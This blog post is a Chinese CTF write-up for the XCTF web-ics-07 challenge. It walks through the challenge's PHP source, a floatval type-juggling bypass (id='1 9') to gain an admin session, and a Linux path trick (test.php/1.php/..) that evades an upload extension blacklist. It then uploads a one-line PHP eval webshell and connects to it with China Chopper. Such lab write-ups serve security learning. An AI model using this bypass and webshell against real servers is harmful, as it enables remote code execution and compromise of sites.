2. 程式人生 > 實用技巧 >攻防世界-web-ics-07(PHP弱型別、linux目錄結構特性繞過檔案型別過濾)

攻防世界-web-ics-07(PHP弱型別、linux目錄結構特性繞過檔案型別過濾)

阿新 發佈:2020-09-16

工控雲管理系統專案管理頁面解析漏洞。

進入題目後,點選進入專案管理頁面。

點選view-source檢視原始碼。

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>cetc7</title>
  </head>
  <body>
    <?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    
 
?>

    <form action="#" method="get">
      page : <input type="text" name="page" value="">
      id : <input type="text" name="id" value="">
      <input type="submit" name="submit" value="submit">
    </form>
    <br />
    <a href="index.phps">view-source</
 
a>

    <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     
 
?>

    <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

  </body>
</html>
View Code

1 程式碼解析:發現漏洞

下面對程式碼進行解析。關鍵程式碼有3段。

第一段

如果傳入的引數page的值不是index.php,則包含flag.php,否則重定向到?page=flag.php。

    <?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>

第二段

$_SESSION['admin'] = True的情況下,POST提交con和file兩個引數,對$filename進行正則判斷,如果判斷正確檔案會被上傳到uploaded/backup目錄下。正則匹配這裡把一些字尾加入了黑名單

    <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

第三段

這一段可以使$_SESSION['admin'] = True;我們來看一下怎麼構造。他需要獲取一個id引數, 並且id不為1,且最後一位等於9。
這裡用到了floatval這個函式,floatval 函式用於獲取變數的浮點值,但是floatval在遇到字元時會截斷後面的部分,比如-,+,空格等,所以可以構造id=1 9來滿足第一個if條件,if條件滿足可以使得$result變數為TRUE。成功使$_SESSION['admin'] = True;

    <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

2 構造payload:上傳木馬

下面考慮如何上傳木馬檔案。這裡利用Linux的一個目錄結構特性。我們遞迴的在1.php資料夾中再建立2.php,訪問1.php/2.php/..進入的是1.php資料夾

payloa如下

con=<?php @eval($_POST[muma]);?>&file=test.php/1.php/..

注意這裡page引數的值不能為flag.php,否則是上傳不成功的。

訪問/uploaded/backup/目錄,發現上傳成功。

3 菜刀連線:獲取flag

上菜刀。

參考:https://www.cnblogs.com/HelloCTF/p/13188482.html

相關推薦

攻防世界-web-ics-07PHP型別linux目錄結構特性繞過檔案型別過濾)

工控雲管理系統專案管理頁面解析漏洞。 進入題目後,點選進入專案管理頁面。

攻防世界-web-ics-02sql注入ssrf目錄掃描)

題目來源:XCTF 4th-CyberEarth題目描述:工控雲管理系統的文件中心頁面,存在不易被發現的漏洞。

攻防世界web進階一)

1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。

攻防世界 - Web進階二)

supersqli: !!!) 1.判斷有誤注入,1\'報錯, 1’ 報錯,1’# 正常且為True,1’ and 1=1# 正常且為True,1’ and 1=2# 正常且為False,所以它裡邊存在注入。

攻防世界-web-unfinishsql二次注入)

題目來源:網鼎杯 2018題目描述:SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-php_rceThinkPHP 5.0命令執行漏洞)

本題進入場景後顯示如下頁面 這是一個 thinkphp 框架,先檢視版本號。在網址上隨意輸入一個不存在的模組 地址:

攻防世界-web-Web_php_wrong_nginx_config繞過登入目錄瀏覽後門利用)

進入場景後,提示需要登入 嘗試開啟robots.txt頁面,發現2個隱藏頁面:hint.php和Hack.php

攻防世界-web-comment密碼爆破.git洩漏程式碼審計sql二次注入)

題目來源:網鼎杯 2018題目描述:SQL 一密碼爆破 進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面

攻防世界-web-favorite_numberphp5.5的陣列key溢位換行符繞過正則跨行匹配inode號繞過檔名過濾檔案輸出繞過正則)

進入介面 <?php //php5.5.9 $stuff = $_POST[\"stuff\"]; $array = [\'admin\', \'user\']; if($stuff === $array && $stuff[0] != \'admin\') {

攻防世界-web-love_mathbase_convert進位制轉換繞過白名單和長度限制)

題目來源:CISCN題目描述:解密 進入介面 <?php error_reporting(0); //聽說你很喜歡數學,不知道你是否愛它勝過愛flag

攻防世界-web-blgdel.htaccess檔案上傳上傳+包含漏洞)

題目來源:CISCN-2018-Final題目描述:暫無 開啟頁面,是一個購物網站,可以註冊登入新增購物車購買商品等。

攻防世界-web-filemanager原始碼洩漏二次注入)

題目來源:XDCTF 2015題目描述:暫無 進入介面 這題看似檔案上傳,其實主要是利用sql注入修改指定檔案在資料庫中的字尾名為空。

攻防世界 - Misc進階一)

base64÷4: 1.下載附件,是一個.txt檔案,開啟是一串字元, 666C61677B45333342374644384133423834314341393639394544444241323442363041417D

攻防世界-Web進階-supersqli

很久之前做的題目了,現在拿到有點想不起來,記一下方法 其一:堆疊注入rename+alter)

攻防世界-web PHP2

首先我們先將環境下載下來。 進入之後 ,發現一句話 Can you anthenticate to this website?大概就是在說,你能告訴我這個網站嗎?

攻防世界-web進階-Web_php_include

從程式碼中得知page中帶有php://的都會被替換成空 str_replace()以其他字元替換字串中的一些字元(區分大小寫)

攻防世界-web-Confusion1(python模板注入SSTI沙箱逃逸)

題目來源:XCTF 4th-QCTF-2018題目描述:某天,Bob說:PHP是最好的語言,但是Alice不贊同。所以Alice編寫了這個網站證明。在她還沒有寫完的時候,我發現其存在問題。(請不要使用掃描器)

攻防世界-web-高手進階區017-supersqli

方法一: 1.輸入1’發現不回顯,然後1’ #顯示正常,應該是存在sql注入了      

攻防世界Web篇前五題解析

第一題 進入以後我們發現右鍵檢視原始碼被禁用了,這時候有兩種解決方法。

xctf攻防世界Web新手練習區view_source單題思路

xctf攻防世界Web新手練習區view_source單題思路 @王雪福 前言 如果你想做網站又不會的話,你會怎麼辦?當然是利用原始碼啦!